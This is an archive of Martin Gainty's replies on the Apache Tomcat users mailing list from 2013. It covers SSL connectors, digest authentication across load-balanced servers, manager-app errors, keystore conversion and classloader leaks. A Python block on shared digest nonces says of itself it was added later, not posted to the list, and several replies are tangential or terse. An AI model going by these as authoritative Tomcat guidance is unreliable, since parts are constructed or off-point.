MGsecurity.tls.version.min = 0 (SSL 3.0); 

 
 Do you have any non-default setting for security.enable_ssl3 or
 security.enable_tls?
 
  Can anyone suggest some possible reasons for this error?
  
  <Connector port="8443" 
  protocol="org.apache.coyote.http11.Http11Protocol" 
  SSLEnabled="true" scheme="https" secure="true" clientAuth="false" 
  sslProtocol="TLS" keystoreFile="my.keystore" 
MGsslProtocol=SSLv3
 
  keystorePass="acdfv123" truststoreFile="my.keystore" 
  truststorePass="acdfv123" connectionTimeout="2" 
  redirectPort="18443" maxThreads="150" maxSpareThreads="75" 
  enableLookups="false" acceptCount="100" 
  disableUploadTimeout="true" URIEncoding="UTF-8" server="Apache" />
 
 Can you try using OpenSSL's s_client with various options (for TLS
 protocol) to see which ones do and do not work?
 
 - -chris
 
MGhttps://support.mozilla.org/en-US/questions/963325

 
  

RE: linking (limiting???)

2013-12-15 Thread Martin Gainty

  


 Date: Sun, 15 Dec 2013 12:41:55 -0800
 From: its_toas...@yahoo.com
 To: users@tomcat.apache.org
 Subject: Re: linking (limiting???)
 
 On 12/15/2013 8:34 AM, Ray Holme wrote:
  I am a Linux user and love linking things to reduce copies.
 
  Apache/Tomcat (by default) does not allow symbolic linking (nice as
  it can cross mounted file systems) except in the top apache/lib
  directory. I use hard links in the Application/WEB-INF/lib
  directories to reduce copying and help me manage things.
 
  HOWEVER, some applications have special needs - e.g. pictures. You
  don't want to always distribute these with the release of the
  application (Application.war file), so symbolic links are the way to
  go (except for MS land, sorry). The nice solution to this is:
  .../webapps/Application/WEB-INF/context.xml which must contain at
  least the two below lines:
 
  <?xml version="1.0" encoding="UTF-8"?>
  <Context allowLinking="true">
  </Context>
 
 
  However this allows ALL symbolic linking in the Application
  directory. I agree with the developers that this is dangerous.
 
  Is there some way to allow linking in just ONE sub-directory of the
  Application?? - e.g.
 
  .../webapps/Application/images
 
  This would allow all I need to have local images for the application
  without endangering other things using a symbolic link.
 
 
 If you use Tomcat 7, read the following:
 
 http://tomcat.apache.org/tomcat-7.0-doc/config/context.html#Resource_Definitions

MG...Mark I assume you're referring to Virtual DirContext...?
<Context path="/mywebapp" docBase="/Users/theuser/mywebapp/src/main/webapp">
  <Resources className="org.apache.naming.resources.VirtualDirContext"
    extraResourcePaths="/WEB-INF/classes=/Users/theuser/mywebapp/target/classes,/pictures=/Users/theuser/mypictures,/movies=/Users/theuser/mymovies" />
</Context>

 . . . just my two cents
 /mde/
MGThanks Mark, 
 
  

RE: Transfer-Encoding: chunked not working

2013-12-03 Thread Martin Gainty
chunked only works on HTTP 1.1 connections
display $CATALINA_HOME/conf/server.xml

Martin-- 


  


 Date: Tue, 3 Dec 2013 15:55:22 -0800
 Subject: Transfer-Encoding: chunked not working
 From: cbman...@gmail.com
 To: users@tomcat.apache.org
 
 Tomcat 7.0.47, OSX 10.8. Fresh install via homebrew. I'm running a web app
 with Tomcat that is returning the header Transfer-Encoding: chunked and
 seemingly exactly one 16384-byte chunk of content that is longer than that.
 Consequently the page that should be transferred is not rendered by the
 user agent (Chrome in this case). AFAICT it's Tomcat that isn't sending all
 the chunks properly. Why might it not be doing that? What else might be the
 problem?
 
 -- 
 C. Benson Manica
 cbman...@gmail.com
  

RE: Same realm for three different countries

2013-12-02 Thread Martin Gainty
$CATALINA_HOME/src> grep -S -l locale *Realm*.*
---Nothing---

 

I'm going to agree with Chris

2 options:
1)Make a 'Enhancement Request' to introduce localisation parameter for 
JDBCRealm 
2)code the localisation parameter into CustomRealm yourself and submit a patch

 

http://tomcat.apache.org/bugreport.html#How_to_submit_patches_and_enhancement_requests

 

Good luck!
Martin  

  


 Date: Mon, 2 Dec 2013 23:40:59 +0100
 Subject: Re: Same realm for three different countries
 From: stefan.a.f...@gmail.com
 To: users@tomcat.apache.org
 
 do you see an entry point where to start?
 i already have a customRealm
 
 2013/12/2 Christopher Schultz ch...@christopherschultz.net:
 
  Stefan,
 
  On 12/2/13, 2:23 PM, Stefan Frei wrote:
  tomcat 7.0.42
 
  debian
 
  I have the same webapplication responsible for providing services
  for three different countries.
 
  Therefore 3 slightly different database schemes exist on my mysql
  instance.
 
  one for ch(switzerland), one for de(germany) and one for
  at(austria).
 
  now my auth-realm which extends RealmBase should be able to decide
  to which schema to connect to, depending on the requested url.
 
  for example requests to webapp.ch should use the table users in
  schema ch.
 
  how am i able to read out httprequest or session in the realm to
  identify for which country the request is destined?
 
  The short answer is that you can't, at least with Tomcat's stock Realm
  implementations.
 
  You can hack your own Realm, but you'll also need to hack around a bit
  more, since the Realm itself doesn't get any access to the servlet
  request information.
 
  - -chris
 
  

RE: multiple servers and digest authentication

2013-12-01 Thread Martin Gainty


  


 From: cdeha...@ebay.com
 To: users@tomcat.apache.org
 CC: cdeha...@ebay.com
 Subject: Re: multiple servers and digest authentication
 Date: Sat, 30 Nov 2013 01:55:32 +
 
 Hi,
 
 Thanks for your answers:
 
 1/ Sticky session : yes, that is the way I have currently set my load
 balancer. 
 But there is a drawback when the client is continuously using the service
 = because it will never be load balanced again.
 The worst is when one of the servers is stopped and restarted = all the
 clients will be redistributed to the still alive servers,
 And when the server is restarted, it will not pick up any load
 
 To work-around this problem, with sticky session on , I have patched my
 client to clear the sticky cookie every X minutes. That enforces the load
 balancer to give me the less used servers (possibly the ones that have been
 restarted)
 
 2/ front-end load balancer solution: my configuration is with an F5 load
 balancer (citrix). From what I understand, the question is : can we
 configure the F5 to manage the nonce and then delegate the authentication
 to the servers (tomcat)- . It will require:
 F5 to manage the nonce (will send back the 401 when nonce not valid) but
MG> here is the XSD element definition for nonce using wss4j
MG> xmlns:xenc="http://www.w3.org/2001/04/xmlenc#"
MG> <!-- KANonce -->
<ObjectProvider qualifiedName="xenc:KA-Nonce">
    <BuilderClass className="org.opensaml.xml.encryption.impl.KANonceBuilder" />
    <MarshallingClass className="org.opensaml.xml.schema.impl.XSBase64BinaryMarshaller" />
    <UnmarshallingClass className="org.opensaml.xml.schema.impl.XSBase64BinaryUnmarshaller" />
</ObjectProvider>

MG> so how would F5 build out a nonce such as
<EncryptedData>
  <EncryptionMethod Algorithm="Example:Block/Alg">
    <KeySize>80</KeySize>
  </EncryptionMethod>
  <ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
    <AgreementMethod Algorithm="example:Agreement/Algorithm">
      <KA-Nonce>Zm9v</KA-Nonce>
      <ds:DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha1"/>
      <OriginatorKeyInfo>
        <ds:KeyValue></ds:KeyValue>
      </OriginatorKeyInfo>
      <RecipientKeyInfo>
        <ds:KeyValue></ds:KeyValue>
      </RecipientKeyInfo>
    </AgreementMethod>
  </ds:KeyInfo>
  <CipherData>...</CipherData>
</EncryptedData>
MG> ?
 not verify the user credential and pass that to servers
 
 Servers (tomcat) to not check the nonce but check the credential. I have
 read the description of tomcatAuthentication flag from André's link, but
 I'm not sure it does what I expect
 
 Any idea if this is feasible from F5/tomcat point of views?
 Any other suggestions? ;)
 
 Thanks,
 
 Xtof
 
 On 11/27/13 9:04 AM, Christopher Schultz ch...@christopherschultz.net
 wrote:
 
 
 André,
 
 On 11/27/13, 5:15 AM, André Warnier wrote:
  Mark Thomas wrote:
  On 27/11/2013 07:34, Dehaudt, Christophe wrote:
  Is there a way to share the nonce between servers so they can
  act as one?
  
  No. You'd need to customise the DigestAuthenticator to do that.
  
  I would like to get your advices , how to make a multiple
  server deployment running with Http digest.
  
  Use sticky load-balancing.
  
  
  Or do the authentication at the front-end load-balancer level, and
  set Tomcat's authentication to accept what the front-end says ?
  (E.g. https://tomcat.apache.org/tomcat-8.0-doc/config/ajp.html#Standard_Implementations
  #tomcatAuthentication)
 
 While it is popular to do so, I don't think anyone really uses httpd
 for industrial-strength load-balancing. Can an F5 do authentication
 (and forward it to Tomcat?). I suspect not in any way that would work
 well with the back-end application.
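
The nonce-sharing question in this thread, as an added example that is not part of the original posts and is not Tomcat's DigestAuthenticator: a stateless, HMAC-signed nonce in the style RFC 2617 suggests lets any node holding the same secret validate a challenge issued by another node. The `Node` class, `REALM`, `NONCE_LIFETIME`, the shared secret and the account are all assumptions constructed for the illustration.

```python
import hashlib
import hmac
import os
import time
from typing import Optional

NONCE_LIFETIME = 300  # seconds a nonce stays fresh (assumed policy value)
REALM = "example"     # hypothetical realm name


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def make_nonce(secret: bytes, now: Optional[float] = None) -> str:
    """Issue '<unix-time>:<salt>:<HMAC-SHA256(secret, time:salt)>'."""
    ts = str(int(time.time() if now is None else now))
    salt = os.urandom(8).hex()
    mac = hmac.new(secret, f"{ts}:{salt}".encode(), hashlib.sha256).hexdigest()
    return f"{ts}:{salt}:{mac}"


def check_nonce(secret: bytes, nonce: str, now: Optional[float] = None) -> str:
    """Return 'ok', 'stale' or 'invalid' using only the shared secret."""
    parts = nonce.split(":")
    if len(parts) != 3:
        return "invalid"
    ts, salt, mac = parts
    expected = hmac.new(secret, f"{ts}:{salt}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac.encode(), expected.encode()):
        return "invalid"
    # The MAC matched, so ts is a timestamp one of our nodes wrote.
    age = (time.time() if now is None else now) - int(ts)
    return "ok" if 0 <= age <= NONCE_LIFETIME else "stale"


def digest_response(ha1, method, uri, nonce, nc, cnonce, qop="auth") -> str:
    """RFC 2617 request-digest for qop=auth."""
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


class Node:
    """One back-end server: holds the shared secret and HA1 values, no nonce cache."""

    def __init__(self, secret: bytes, ha1_by_user: dict):
        self.secret = secret
        self.ha1_by_user = ha1_by_user

    def challenge(self, now=None, stale=False) -> dict:
        return {"realm": REALM, "qop": "auth", "stale": stale,
                "nonce": make_nonce(self.secret, now)}

    def authenticate(self, method: str, auth: dict, now=None):
        """Return (HTTP status, new challenge or None)."""
        state = check_nonce(self.secret, auth["nonce"], now)
        ha1 = self.ha1_by_user.get(auth["username"], "")
        expected = digest_response(ha1, method, auth["uri"], auth["nonce"],
                                   auth["nc"], auth["cnonce"])
        digest_ok = bool(ha1) and hmac.compare_digest(
            expected.encode(), auth["response"].encode())
        if state == "ok" and digest_ok:
            return 200, None
        # RFC 2617: stale=true only when the digest was right for an expired nonce.
        return 401, self.challenge(now, stale=(state == "stale" and digest_ok))
        # Trade-off: without a shared nonce-count store, a replayed header is
        # accepted until the nonce expires; keep the lifetime short and use TLS.


def client_authorization(user, password, method, uri, challenge) -> dict:
    """What a Digest client sends back for a given challenge."""
    cnonce, nc = os.urandom(8).hex(), "00000001"
    ha1 = md5_hex(f"{user}:{challenge['realm']}:{password}")
    return {"username": user, "uri": uri, "nonce": challenge["nonce"],
            "nc": nc, "cnonce": cnonce,
            "response": digest_response(ha1, method, uri,
                                        challenge["nonce"], nc, cnonce)}


def demo() -> dict:
    shared = b"constructed-cluster-secret"             # constructed sample value
    users = {"xtof": md5_hex(f"xtof:{REALM}:s3cret")}  # constructed account, stored as HA1
    node_a, node_b = Node(shared, users), Node(shared, users)
    outsider = Node(b"some-other-secret", users)       # node with a different key
    t0 = 1385500000
    auth = client_authorization("xtof", "s3cret", "GET", "/service",
                                node_a.challenge(now=t0))
    return {
        "issuer": node_a.authenticate("GET", auth, now=t0 + 5),
        "peer": node_b.authenticate("GET", auth, now=t0 + 5),
        "outsider": outsider.authenticate("GET", auth, now=t0 + 5),
        "expired": node_b.authenticate("GET", auth, now=t0 + NONCE_LIFETIME + 1),
    }


if __name__ == "__main__":
    for name, (status, new_challenge) in demo().items():
        print(name, status, new_challenge and new_challenge["stale"])
```
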
 
 
 
  

RE: Patch information required

2013-11-28 Thread Martin Gainty
I will contact all the engineers i know who want to work free for Accenture

Goodbye

  


 From: kanishk.se...@accenture.com
 To: users@tomcat.apache.org
 CC: pravin.pa...@accenture.com
 Subject: Patch information required
 Date: Thu, 28 Nov 2013 06:15:27 +
 
 Hi All,
 
 We are using Apache tomcat version 6.0.26 and we need to install below 
 patches on our servers to fix some Vulnerabilities.
 
 http://svn.apache.org/viewvc?view=revision&revision=958911
 http://svn.apache.org/viewvc?view=revision&revision=958977
 http://svn.apache.org/viewvc?view=revision&revision=959428
 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03298151
 http://www.juniper.net/alerts/viewalert.jsp?txtAlertNumber=PSN-2012-05-584&actionBtn=Search
 
 I am not sure how to install these patches; can anyone help us here?
 
 Regards
 Kanishk Sethi
 
 
 
  

Felix plugin for Tomcat?

2013-11-20 Thread Martin Gainty
All-

 

Is/are there any efforts to integrate Apache Felix OSGI Console Functions (as a 
TC plugin) into either Tomcat 7.x or Tomcat 8x?

http://felix.apache.org/


Thanks,
Martin 


 
  

RE: PersistentManager + JdbcStore

2013-11-09 Thread Martin Gainty
..Perhaps..

http://kickjava.com/src/com/lutris/appserver/server/sessionContainerAdapter/JmxContainerAdapterSessionManager.java.htm

(Install as a JMX agent)

Kind regards
Martin 

  



 Date: Sat, 9 Nov 2013 16:07:42 -0300
 Subject: Re: PersistentManager + JdbcStore
 From: jbig1...@gmail.com
 To: users@tomcat.apache.org
 
 Thanks for this post, but the problem that I have is uncertain. My
 application is Java Web and creates a session for the user in Tomcat
 (version apache-tomcat-7.0.29) and an unusual one user captures the user
 session without finding an explanation.
 
 Could you help me or tell me who to contact to find out how Tomcat creates
 and validates sessions created and if possible capture the session of
 another user from different computers.
 
 Best Regards
 
 
 2013/11/9 spr...@gmx.eu
 
 I think I will fix the DynamoDB-Sessionmanager.
   
Also an option.
  
   Already in process it seems ;)
  
   https://github.com/aws/aws-dynamodb-session-tomcat/issues/3
  
   I hope they will use the code from tomcat for managing the classloader
   issues.
 
  Well, just realized that this Manager is based on PersistentManagerBase.
  So I see no improvement in terms of reliability, because it still writes
  the
  data async into DynamoDB.
  I even cannot see the reason why they created DynamoDBSessionManager,
  DynamoDBSessionStore would have done the job too then.
 
  Looking into the Manager interface (public void backgroundProcess()) tells
  me, that it seems to be always async?
 
  So what is the right strategy to distribute sessions across an arbitrary
  amount of servers with a 100% guarantee that the session will be found at
  any time on any server?
 
  Thank you
 
 
 
 
  

RE: Bin Folders

2013-11-06 Thread Martin Gainty
to hammer home what Jordan is saying:

sh/cmd/bat files are usually based on environment variables e.g.

CATALINA_BASE to the exact location of the specific TOMCAT Instance you are 
running

CATALINA_HOME to the exact location of the folder where TOMCAT was installed

assuming you have set unique service_name for each service

 

http://grokbase.com/t/tomcat/users/1351gyqtgb/multiple-tomcat-containers-or-instance-on-same-servers

if memory serves there is a 

SC query TomcatServiceName 

which should display details for each TOMCAT service

services.msc at run command provides the same info

If CATALINA_BASE changes you will need to uninstall and reinstall to make sure 
the registry has a clean
configuration for the TC instance

I'll defer to Jordan, Dave and others to guide you thru that process..
  



 Date: Wed, 6 Nov 2013 10:39:13 -0800
 From: jor...@viviotech.net
 To: users@tomcat.apache.org
 Subject: Re: Bin Folders
 
 Have you made changes that you want to keep? In my experience the 
 installer script and exe's are fairly well removed from the other files 
 in the bin folder.
 
 Unless you've made specific changes to files that you want to keep, I 
 don't see the point of what you're doing. If you *have* made changes, 
 why not just copy the files you've changed and leave it at that? Make 
 life easier on yourself. ;)
 
 Warm Regards,
 Jordan Michaels
 
 On 11/06/2013 10:29 AM, Crystal Maramba wrote:
  I will as soon as I combine the bin folders.
 
  The service installer does not include the scripts which is what I need 
  from the first install.
 
  Would you know if there will be any issues with the rest of the folders?
 
  -Original Message-
  From: Jordan Michaels [mailto:jor...@viviotech.net]
  Sent: Wednesday, November 06, 2013 10:25 AM
  To: Tomcat Users List
  Subject: Re: Bin Folders
 
  From my experience, no; there should not be an issue with that. Why not 
  just get rid of the first install if you're not going to use it? Keep your 
  system clean and less confusing.
 
  Warm Regards,
  Jordan Michaels
 
  On 11/06/2013 09:34 AM, Crystal Maramba wrote:
  Tomcat version: 7.0.42
  Operating System: Server 2008 x64 (Standard)
  Question:
  I have two Tomcat File Directories:
  1) Windows service installer location: \Program Files\Apache Software
  Foundation\Tomcat 7.0
  2) Base distribution location: \Program Files\Apache\Tomcat 7.0 (this
  did not include the windows service wrapper)
 
  Item 1) was installed after the 2) base distribution location was already 
  configured but we needed to use the 1) windows service installer.
 
  Can I combine the files (.bat scripts) from the bin folders so that all 
  the files with the bin folder in location 2) is in location 1)? Will there 
  be an issue to do this?
 
 
 
 
 
  

RE: Fix your web application so it can cleanly un-deploy and re-deploy - how?

2013-11-06 Thread Martin Gainty
Spring's overuse of CGLib for interfaces is a memory consumer
Retask CGLib Proxy to JDKProxy to create your Impl classes for @Before advised 
methods

proxyTargetClass: false

Similarly using Javassist with Hibernate reduced memory footprint over CGLib 
significantly

 

http://docs.spring.io/spring/docs/3.0.0.M4/reference/html/ch08s05.html

http://what-when-how.com/Tutorial/SpringFramework3/SpringFramework300224.html

 

Dale: How did Mattias Jiderhamn's library help?


Martin  


  



 Subject: Fix your web application so it can cleanly un-deploy and re-deploy - 
 how?
 Date: Thu, 7 Nov 2013 11:50:03 +1300
 From: dale_ogil...@trimble.com
 To: users@tomcat.apache.org
 
 Chris made the following good suggestion in another thread:
 
 Can I make a suggestion? Fix your web application so it can cleanly 
 un-deploy and re-deploy and then simply do a hot deployment?
 
 I've been down this track with our own Spring web apps and found it to be 
 quite a deep rabbit hole where a number of 3rd party libs are used. We get 
 the issue where the webapp classloader is not GC'ed due to classes in the 
 libraries we use not being terminated cleanly. Which means we get a big 
 permgen memory leak when we redeploy the app. The occasional tomcat restart 
 workaround is effective, if nasty.
 
 I did what Chris suggested for one of our apps and I think I got to 3rd party 
 library problem number FIVE (an oracle jdbc driver connection timer) before I 
 gave up in disgust. As I recall undisposed thread locals were a common theme. 
 I used various strategies to resolve the prior issues in things as simple as 
 logging frameworks, JMS queuing libraries, underlying http client code etc. 
 Strategies such as:
 
 1. Specifically calling a low level library finalization routine in a context 
 listener or Spring lifecycle bean
 2. Updating the 3rd party library to a later version which fixed the leak
 3. Including Mattias Jiderhamn's active leak prevention library
 
 I would so love it if Tomcat could just throw away the entire webapp memory 
 footprint on undeploy... Tomcat 7x memory leak protection wasn't good enough 
 for our app a few months ago.
 
 Or failing that, if anyone can share successful strategies for Fixing your 
 web application so it can cleanly un-deploy and re-deploy please do.
 
 Dale
 
 Ref: http://wiki.apache.org/tomcat/MemoryLeakProtection
 Ref: https://github.com/mjiderhamn/classloader-leak-prevention
 
 -Original Message-
 From: Christopher Schultz [mailto:ch...@christopherschultz.net] 
 Sent: Thursday, 7 November 2013 10:44 a.m.
 To: Tomcat Users List
 Subject: Re: how to bounce tomcat remote?
 
 snip
 Can I make a suggestion? Fix your web application so it can cleanly un-deploy 
 and re-deploy and then simply do a hot deployment?
 snip
  

RE: Secure Tomcat With SSL

2013-10-28 Thread Martin Gainty
For over a year I've been looking for a tool to show the RFC 822 name and the 
PEM

 

Thanks craig!
Martin 

  



 Date: Mon, 28 Oct 2013 16:43:53 -0400
 Subject: Re: Secure Tomcat With SSL
 From: craig.tay...@drivedominion.com
 To: users@tomcat.apache.org
 
 This tool has saved me a few times over:
 http://sourceforge.net/projects/portecle/
 
 
 On Mon, Oct 28, 2013 at 4:41 PM, Ognjen Blagojevic 
 ognjen.d.blagoje...@gmail.com wrote:
 
  Chris,
  Leo,
 
  On 28.10.2013 18:23, Leo Donahue - OETX wrote:
 
  I've been having some trouble lately converting keys and certs from
  OpenSSL
  format into Java's JKS format. I follow all of the magical incantations
  I can find
  online to convert key+cert into a Java keystore but I get no love. Is
  there a
  decent guide anywhere for how to do this?
 
 
  From my book of spells.
 
  Used this to configure SSL in Apache httpd for subversion edge.
 
  openssl pkcs12 -export -in C:/server.crt -inkey C:/server.key -name
  svnedge -out C:/server.p12
 
  keytool -importkeystore -srckeystore C:/server.p12 -srcstoretype PKCS12
  -destkeystore C:/svnedge.jks
 
 
  During TLS handshake, server may respond with complete certificate chain
  (server certificate with all intermediate certificates) or with incomplete
  certificate chain (e.g. server certificate, without any/some intermediate
  certificates). Most servers, around 88% of them, deliver full certificate
  chain, according to research mentioned here [1].
 
  Complete certificate chain is being recognized as valid by every client
  that implements TLS (assuming that root CA certificate is in the client
  keystore). Incomplete certificate chain may be recognized as valid by some
  TLS clients (e.g. Internet Explorer), using information from X.509v3
  extension called Authority Information Access (AIA), or using previously
  validated certificate chains. Some clients will not recognize incomplete
  certificate chain as valid (e.g. openssl or Apache HTTPCommons Client).
  Even the same client may sometimes recognize incomplete certificate chains
  as valid and sometimes as invalid, thanks to caching of intermediate
  certificates. Therefore, it is best practice always to deliver complete
  certificate chain to the client.
 
  Having root CA certificate in the chain is unnecessary, as it wastes your
  bandwidth during TLS handshake (your client already has root CA
  certificate in its own keystore).
 
  Assuming that intermediate certificates (intermediates.pem), server
  certificate (server.pem) and private key (server.key) are all in PEM
  format, you need to add option -certfile to command Leo provided:
 
  openssl pkcs12 -export -out keystore.p12 -name myserver -in server.pem
  -inkey server.key -certfile intermediates.pem
 
 
  Verify the contents of the p12 keystore with:
 
  openssl pkcs12 -in keystore.p12 -nokeys
 
  You should verify that the certificate chain is complete (up to, but
  without root CA certificate).
 
  Now, you may use that keystore for BIO and NIO connectors:
 
  keystoreFile="keystore.p12" keyAlias="myserver" keystoreType="pkcs12"
 
  Or you may convert it to JKS keystore as Leo suggests.
 
  -Ognjen
 
  [1] 
  https://bugzilla.mozilla.org/show_bug.cgi?id=399324#c72
 
 
 
  

RE: possible tomcat 7.0.47 jsr-356 bug: NULL pointer being thrown when DecodeException is caught in PojoMessageHandlerWholeBase<T>.onMessage

2013-10-20 Thread Martin Gainty
Morning Bob-

 

session should never be null..this is a bug

 

create an account here

https://issues.apache.org/bugzilla/createaccount.cgi


and file the bug report

 

Many thanks for discovering this bug and helping us to improve the product


Martin 
__ 

  





From: bob.dere...@thingworx.com
To: users@tomcat.apache.org
Subject: possible tomcat 7.0.47 jsr-356 bug: NULL pointer being thrown when 
DecodeException is caught in PojoMessageHandlerWholeBase<T>.onMessage
Date: Sat, 19 Oct 2013 12:46:05 +







I am testing what happens when Encode/Decode Exceptions occur during JSR-356 
communication and found that in the following code in onMessage, the 
((WsSession)session) is NULL.  As a result, the actual DecodeException (cause) 
is lost.
 
    // Can this message be decoded?
    Object payload;
    try {
        payload = decode(message);
    } catch (DecodeException de) {
        ((WsSession) session).getLocal().onError(session, de);
        return;
    }
 
 
Tracing this further up the stack, I found that Util.getMessageHandlers is 
initializing it and passing NULL in for the session:
 
    if (decoderMatch.getTextDecoders().size() > 0) {
        MessageHandlerResult result = new MessageHandlerResult(
                new PojoMessageHandlerWholeText(listener, m, null,
                        endpointConfig,
                        decoderMatch.getTextDecoders(), new Object[1],
                        0, false, -1, -1),
                MessageHandlerResultType.TEXT);
        results.add(result);
    }
 
Is this a bug, or do I need to do something else to get this internal session 
initialized - in addition to calling: addMessageHandler(this) in the onOpen of 
my Endpoint-derived class?
 
Thanks,
 
 
Bob DeRemer
Senior Director, Architecture and Development
 

http://www.thingworx.com
Skype: bob.deremer.thingworx
O: 610.594.6200 x812
M: 717.881.3986
  

RE: can't connect to manager application

2013-10-19 Thread Martin Gainty


  


 Date: Sat, 19 Oct 2013 10:23:11 +0200
 From: edoa...@aspix.it
 To: users@tomcat.apache.org
 Subject: Re: can't connect to manager application
 
 On 19/10/13 00:24, Mark Eggers wrote:
  On 10/18/2013 3:18 PM, André Warnier wrote:
  Edoardo Panfili wrote:
  Il 17/10/13 18:45, Edoardo Panfili ha scritto:
  My Tomcat (7.0.42) is listening on port 7080 and I have this
  conf/tomcat-users.xml in (production server)
 
  ---
  <tomcat-users>
  <role rolename="manager-script"/>
  <user username="myname" password="pwd"
  roles="manager-script,manager-gui,manager-jmx"/>
  </tomcat-users>
  --
  if I use
 
  curl -u myname:pwd
  http://localhost:7080/manager/text/reload?path=/myApplication
 
  the response is--
  <h1>404 Not found</h1>
  <p>
  The page you tried to access
  (/manager/text/reload)
  does not exist.
  </p>
  <p>
  The Manager application has been re-structured for Tomcat 7 onwards and some
  of URLs have changed. All URLs used to access the Manager application should
  now start with one of the following options:
  </p>
  <ul>
  <li>/manager/html for the HTML GUI</li>
  <li>/manager/text for the text interface</li>
  <li>/manager/jmxproxy for the JMX proxy</li>
  <li>/manager/status for the status pages</li>
  </ul>
  <p>
  Note that the URL for the text interface has changed from
  &quot;/manager&quot; to
  &quot;/manager/text&quot;.
  </p>
  <p>
  You probably need to adjust the URL you are using to access the Manager
  application. However, there is always a chance you have found a bug in the
  Manager application. If you are sure you have found a bug, and that the bug
  has not already been reported, please report it to the Apache Tomcat team.
  </p>
  -
 
 
  Installation step by step:
 
  Unpack new download from tomcat.apache.org
 
  1- set users
  <tomcat-users>
  <user username="edoardo" password="pwd"
  roles="manager-script,manager-gui,manager-jmx,other"/>
  </tomcat-users>
 
  then reload tomcat
  $curl -u edoardo:pwd
  http://localhost:8080/manager/text/reload?path=/examples
  OK - Reloaded application at context path /examples
 
 
  2- copy myApplication from production server
  copy configuration file ($tomcat/Catalina/localhost/myApplication.xml)
  from production server
  stop & start tomcat
 
  $curl -u edoardo:pwd
  http://localhost:8080/manager/text/reload?path=/myApplication
  OK - Reloaded application at context path /myApplication
 
 
  3- first modify to server.xml
  shutdown tomcat
  modify server.xml
  <Connector port="8080" protocol="HTTP/1.1"
  becomes
  <Connector port="9080" protocol="HTTP/1.1"
 
  start then curl again
  all well
 
 
  4- second modify to server.xml
  <Host name="localhost" appBase="webapps"
  unpackWARs="true" autoDeploy="true">
  becomes
  <Host name="localhost" appBase="webapps"
  unpackWARs="true" autoDeploy="true" deployXML="false">
 
  stop-start
 
  $curl -u edoardo:pwd
  http://localhost:9080/manager/text/reload?path=/myApplication
  javax.servlet.ServletException: Error instantiating servlet class
  org.apache.catalina.manager.ManagerServlet
  [...]
 
  $curl -u edoardo:pwd
  http://localhost:9080/manager/text/reload?path=/myApplication
  the same error reported in the initial post (above)
 
 
 
  deployXML=false is recommended at
  http://tomcat.apache.org/tomcat-7.0-doc/config/host.html and useful
  for me.
 
  One big difference that I see when deployXML=false, is that this file :
  (catalina_base)/webapps/myApplication/META-INF/context.xml
  is no longer being parsed,
  and instead this file is parsed :
  $tomcat/Catalina/localhost/myApplication.xml
  when you reload your app.
  What is the content of that file ?
 
  From the last log file that was posted, these context files are pretty
  broken (although myApplication.xml only had the magic debug attribute set).
 
 
 - unpack tomcat
 - add an user in tomcat-users.xml
 - modify server.xml adding deployXML="false" to Host
 <Host name="localhost" appBase="webapps"
 unpackWARs="true" autoDeploy="true" deployXML="false">
 - use manager application via curl
 $ curl -u user:pwd http://localhost:8080/manager/text/reload?path=/example
 
 error page.
 
 # cat manager.2013-10-19.log
 19-ott-2013 10.16.17 org.apache.catalina.core.ApplicationContext log
 INFO: Marking servlet Manager as unavailable
 19-ott-2013 10.16.17 org.apache.catalina.core.StandardWrapperValve invoke
 GRAVE: Allocate exception for servlet Manager
 java.lang.SecurityException: Restricted (ContainerServlet) class org.apache.catalina.manager.ManagerServlet
 at org.apache.catalina.core.DefaultInstanceManager.checkAccess(DefaultInstanceManager.java:538)
 at org.apache.catalina.core.DefaultInstanceManager.loadClassMaybePrivileged(DefaultInstanceManager.java:511)
 at org.apache.catalina.core.DefaultInstanceManager.newInstance(DefaultInstanceManager.java:137)
 at org.apache.catalina.core.StandardWrapper.loadServlet(StandardWrapper.java:1144)
 at org.apache.catalina.core.StandardWrapper.allocate(StandardWrapper.java:865)
 at 

RE: can't connect to manager application

2013-10-18 Thread Martin Gainty


  


 Date: Fri, 18 Oct 2013 18:04:19 +0200
 From: edoa...@aspix.it
 To: users@tomcat.apache.org
 Subject: Re: can't connect to manager application
 
 On 18/10/13 16:40, André Warnier wrote:
  Edoardo Panfili wrote:
  On 18/10/13 08:43, Ognjen Blagojevic wrote:
  On 18.10.2013 7:34, Edoardo Panfili wrote:
  To rule out faulty upgrade, could you try to reproduce the problem on
  clean Tomcat 7.0.42 install?
  the problem was surely present with 7.0.39, the 7.0.42 is a fresh
  installation for me.
 
  Could you please clarify: does the problem exists on 7.0.42, 7.0.39 or
  both?
  both
 
  Could you provide steps to reproduce the problem on fresh 7.0.42
  installation?
  - unpack tomcat
  - modify listen port
  - modify tomcat-users.xml
  - copy jmxremote.access and jmxremote.password (setting permissions)
  - build jsvc
  - copy configuration files for applications (in
  $tomcat/conf/Catalina/localhost)
 
  thank you for your question: also jmx remote access is not working (in
  both tomcat 7.0.39 and 7.0.42), maybe the two problems are related?
 
 
  I tried to reproduce with the information you provided so far, but I was
  unable. It works for me.
  Also on my local machine, where jmx is not configured.
 
 
 
  Usually, a good place to look first, are the Tomcat logfiles.
  What do they say ?
 
 searching for java.lang.SecurityException: Restricted 
 (ContainerServlet) class org.apache.catalina.manager.ManagerServlet
 
<MG>my HostManagerServlet is defined in webapps/host-manager/WEB-INF/web.xml as:
  <servlet>
    <servlet-name>HostManager</servlet-name>
    <servlet-class>org.apache.catalina.manager.host.HostManagerServlet</servlet-class>
    <init-param>
      <param-name>debug</param-name>
      <param-value>2</param-value>
    </init-param>
  </servlet>
  <servlet>
    <servlet-name>HTMLHostManager</servlet-name>
    <servlet-class>org.apache.catalina.manager.host.HTMLHostManagerServlet</servlet-class>
    <init-param>
      <param-name>debug</param-name>
      <param-value>2</param-value>
    </init-param>
  </servlet>
</MG>
 
 seem that the solution is to add privileged="true" 
<MG>my privileged attr in Context is located at 
/webapps/host-manager/META-INF/context.xml as:
<Context antiResourceLocking="false" privileged="true" />
</MG>
 
 at 
 $tomcat/conf/context.xml... and the reload command now works.
 
 thank you
 Edoardo
MG> many thanks Edoardo
MG> Martin
 
 
 
 
 
  

RE: can't connect to manager application

